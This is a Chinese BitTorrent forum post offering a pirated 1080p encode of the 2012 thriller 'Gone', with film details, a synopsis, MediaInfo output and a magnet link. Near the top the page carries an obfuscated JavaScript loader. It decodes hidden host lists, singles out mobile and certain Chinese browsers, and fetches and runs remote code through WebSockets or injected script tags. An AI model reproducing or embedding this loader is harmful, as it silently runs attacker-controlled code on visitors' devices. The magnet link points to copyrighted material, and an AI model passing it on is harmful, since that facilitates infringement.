夺命追踪[中文字幕].Gone.2012.1080p.BluRay.x265.10bit.DD5.1.MNHD 5.18GB

版主小s 19天前 344

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 夺命追踪 / 致命救援(台) / 失踪少女名单(港) / 踪迹难寻 / 失踪
◎片  名 Gone
◎年  代 2012
◎产  地 美国
◎类  别 剧情 / 悬疑 / 惊悚
◎语  言 英语
◎上映日期 2013-01-25(中国大陆) / 2012-02-24(美国)
◎IMDb链接 https://www.imdb.com/title/tt1838544/
◎豆瓣评分 6.0/10 (10749人评价)
◎豆瓣链接 https://movie.douban.com/subject/6431054/
◎片  长 94分钟
◎导  演 埃托尔·达利亚 Heitor Dhalia (id:1014526)
◎编  剧 埃利森·博耐特 Allison Burnett (id:1325786)
◎演  员 阿曼达·塞弗里德 Amanda Seyfried (id:1053586)
       韦斯·本特利 Wes Bentley (id:1049518)
       詹妮弗·卡朋特 Jennifer Carpenter (id:1041043)
       塞巴斯蒂安·斯坦 Sebastian Stan (id:1021985)
       丹尼尔·逊亚塔 Daniel Sunjata (id:1013851)
       乔·大卫·摩尔  Joel David Moore (id:1027811)
       凯瑟琳·莫宁 Katherine Moennig (id:1010485)
       艾米丽·威克沙姆 Emily Wickersham (id:1350572)

◎标  签 悬疑 / 美国 / 惊悚 / 阿曼达·塞弗里德 / 犯罪 / 2012 / 剧情 / 女性

◎简  介
  吉尔·帕瑞斯(阿曼达·塞弗里德 Amanda Seyfried 饰)下完夜班回到家发现她妹妹莫莉(艾米莉·维克夏姆 Emily Wickersham 饰)被绑架走了。吉尔一年前曾从某个绑架者手中逃脱,她相信这次还是这个罪犯找上门来要再次抓住她,没抓到她却把莫莉劫持走了。警察自上次吉尔报案没查到绑匪任何踪迹后就认为吉尔神经错乱,不愿意动用他们的资源帮助她。警方坚持茉莉只是一时失联应该很快就会回家,对吉儿的报案并不认真当一回事,但吉儿知道茉莉可能很快就会遭遇不测,心急如焚的她只能靠自己的力量,这次她必须再度跟她不愿面对的梦魇周旋。                                    
                                然而只剩12小时了,究竟一切只是她不正常的幻想还是真有其事?她是否还来得及救出亲爱的妹妹?她决定不顾危险自己一人去追查真相,所有答案再度指向那片树林静处,无人知晓的神秘深洞里……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 291843287271845238153597077428767662103 (0xDB8EF8FC7AA62B46FD2B7DA7D59DA017)

  4. Complete name                            : [email protected]v

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.18 GiB

  8. Duration                                 : 1 h 34 min

  9. Overall bit rate                         : 7 812 kb/s

  10. Movie name                               : Gone 2012 1080p BluRay x265 10bit DD5.1 [email protected]

  11. Encoded date                             : UTC 2021-09-03 10:15:53

  12. Writing application                      : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  13. Writing library                          : libebml v1.4.1 + libmatroska v1.6.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 34 min

  21. Bit rate                                 : 7 170 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 812 pixels

  24. Display aspect ratio                     : 2.35:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.192

  31. Stream size                              : 4.75 GiB (92%)

  32. Writing library                          : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  33. Encoding settings                        : cpuid=533541111039 / frame-threads=3 / numa-pools=11 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x812 / interlace=0 / total-frames=136567 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=20.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default                                  : Yes

  35. Forced                                   : No

  36. Color range                              : Limited

  37. Color primaries                          : BT.709

  38. Transfer characteristics                 : BT.709

  39. Matrix coefficients                      : BT.709


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AC-3

  43. Format/Info                              : Audio Coding 3

  44. Commercial name                          : Dolby Digital

  45. Codec ID                                 : A_AC3

  46. Duration                                 : 1 h 34 min

  47. Bit rate mode                            : Constant

  48. Bit rate                                 : 640 kb/s

  49. Channel(s)                               : 6 channels

  50. Channel layout                           : L R C LFE Ls Rs

  51. Sampling rate                            : 48.0 kHz

  52. Frame rate                               : 31.250 FPS (1536 SPF)

  53. Compression mode                         : Lossy

  54. Stream size                              : 435 MiB (8%)

  55. Language                                 : English

  56. Service kind                             : Complete Main

  57. Default                                  : Yes

  58. Forced                                   : No


  59. Text

  60. ID                                       : 3

  61. Format                                   : ASS

  62. Codec ID                                 : S_TEXT/ASS

  63. Codec ID/Info                            : Advanced Sub Station Alpha

  64. Duration                                 : 1 h 27 min

  65. Bit rate                                 : 166 b/s

  66. Count of elements                        : 964

  67. Compression mode                         : Lossless

  68. Stream size                              : 107 KiB (0%)

  69. Title                                    : ChsEng

  70. Language                                 : Chinese

  71. Default                                  : Yes

  72. Forced                                   : No


  73. Menu

  74. 00:00:00.000                             : en:Chapter 01

  75. 00:08:39.018                             : en:Chapter 02

  76. 00:16:23.816                             : en:Chapter 03

  77. 00:24:12.993                             : en:Chapter 04

  78. 00:32:06.925                             : en:Chapter 05

  79. 00:40:43.441                             : en:Chapter 06

  80. 00:47:37.605                             : en:Chapter 07

  81. 00:55:52.140                             : en:Chapter 08

  82. 01:04:19.439                             : en:Chapter 09

  83. 01:12:46.988                             : en:Chapter 10

  84. 01:21:44.358                             : en:Chapter 11

  85. 01:29:32.367                             : en:Chapter 12




TAGS 剧情 惊悚 悬疑

磁力链:
  • magnet:?xt=urn:btih:FC52746F1E479C762B464DC29B28A3A63CF97919
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回